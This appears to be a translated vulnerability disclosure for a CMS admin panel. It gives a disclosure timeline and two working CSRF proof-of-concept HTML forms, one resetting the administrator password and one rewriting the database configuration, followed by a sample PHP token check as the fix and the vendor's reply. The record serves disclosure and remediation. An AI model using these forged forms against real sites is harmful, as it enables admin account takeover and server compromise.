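2015-03-25: Details reported to the vendor; awaiting vendor handling
2015-03-26: Vendor confirmed; details disclosed to the vendor only
2015-03-29: Details opened to third-party security partners
2015-05-20: Details disclosed to core white hats and experts in related fields
2015-05-30: Details disclosed to regular white hats
2015-06-09: Details disclosed to intern white hats
2015-06-24: Details disclosed to the public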
CSRF
The impact is serious. First, the administrator password can be changed:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Master/Update" method="POST">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="pwd2" value="7fef6171469e80d32c0559f88b377245" />
      <input type="hidden" name="pwd" value="shabi123" />
      <input type="hidden" name="repwd" value="shabi123" />
      <input type="hidden" name="usertype[0]" value="1" />
      <input type="hidden" name="usertype[1]" value="1" />
      <input type="hidden" name="usertype[2]" value="1" />
      <input type="hidden" name="usertype[3]" value="1" />
      <input type="hidden" name="usertype[4]" value="1" />
      <input type="hidden" name="usertype[5]" value="1" />
      <input type="hidden" name="usertype[6]" value="1" />
      <input type="hidden" name="usertype[7]" value="1" />
      <input type="hidden" name="usertype[8]" value="1" />
      <input type="hidden" name="usertype[9]" value="1" />
      <input type="hidden" name="usertype[10]" value="1" />
      <input type="hidden" name="usertype[11]" value="1" />
      <input type="hidden" name="usertype[12]" value="1" />
      <input type="hidden" name="usertype[13]" value="1" />
      <input type="hidden" name="usertype[14]" value="1" />
      <input type="hidden" name="usertype[15]" value="1" />
      <input type="hidden" name="usertype[16]" value="1" />
      <input type="hidden" name="usertype[17]" value="1" />
      <input type="hidden" name="usertype[18]" value="1" />
      <input type="hidden" name="submit" value="提交" />
      <input type="hidden" name="__hash__" value="8637bf9833545453f7649bd6e16ad060" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
The database can also be changed:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Config/Updatedb" method="POST">
      <input type="hidden" name="con[db_host]" value="admin" />
      <input type="hidden" name="con[db_name]" value="ekucms" />
      <input type="hidden" name="con[db_user]" value="root" />
      <input type="hidden" name="con[db_pwd]" value="admin888" />
      <input type="hidden" name="con[db_port]" value="3306" />
      <input type="hidden" name="submit" value="提交" />
      <input type="hidden" name="__hash__" value="c59f9ef9c6e6f578038f368ff2b9817a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
SQL statements can be executed here, which could be leveraged to get a shell and escalate privileges.
Add a token.
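The suggested fix ("add a token"), sketched as an added example that is not code from the original report or from the CMS: a random per-session token is issued when the admin form is rendered and checked with a constant-time comparison before a state-changing handler such as the password update runs. The function names, the `csrf_token` field name and the sample requests are assumptions made for illustration.

```php
<?php
// Added example: per-session CSRF token for state-changing admin requests.
// All names here (csrf_issue, csrf_verify, handle_password_update, the
// csrf_token field) are hypothetical and not taken from the CMS.

function csrf_issue(array &$session): string
{
    // 256 bits from the CSPRNG; unpredictable to a third-party page.
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

function csrf_verify(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing tokens and non-string input such as csrf_token[]=x.
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

function handle_password_update(array &$session, array $post): string
{
    if (!csrf_verify($session, $post)) {
        return '403 token mismatch, nothing changed';
    }
    csrf_issue($session); // rotate so a captured token cannot be replayed
    return '200 password updated for id ' . (int) $post['id'];
}

// Constructed sample data: one logged-in admin session and three requests.
$session = ['admin_id' => 1];
$token   = csrf_issue($session); // rendered into the real admin form

$legit  = ['id' => '1', 'pwd' => 'new-secret', 'csrf_token' => $token];
// Cross-site form: the hosting page can only ship a value fixed in advance.
$forged = ['id' => '1', 'pwd' => 'attacker-choice', 'csrf_token' => str_repeat('0', 64)];
$bare   = ['id' => '1', 'pwd' => 'attacker-choice'];

foreach (['forged' => $forged, 'bare' => $bare, 'legit' => $legit] as $name => $post) {
    echo $name, ': ', handle_password_update($session, $post), PHP_EOL;
}
```

The check only helps if every state-changing admin action calls it server-side; a hidden field that is sent but never compared against the session gives no protection.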
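Severity: Low
Vulnerability Rank: 2
Confirmed: 2015-03-26 12:12
So the prerequisite is that the attacker needs to know important system parameters before this can be exploited, is that right? For example the administrator account, password, DB information and so on. A token is indeed necessary. Thank you for the reminder!
None yet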